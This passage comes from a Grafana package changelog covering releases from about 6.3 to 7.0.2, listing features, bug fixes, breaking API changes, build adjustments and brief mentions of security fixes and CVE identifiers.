#25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range 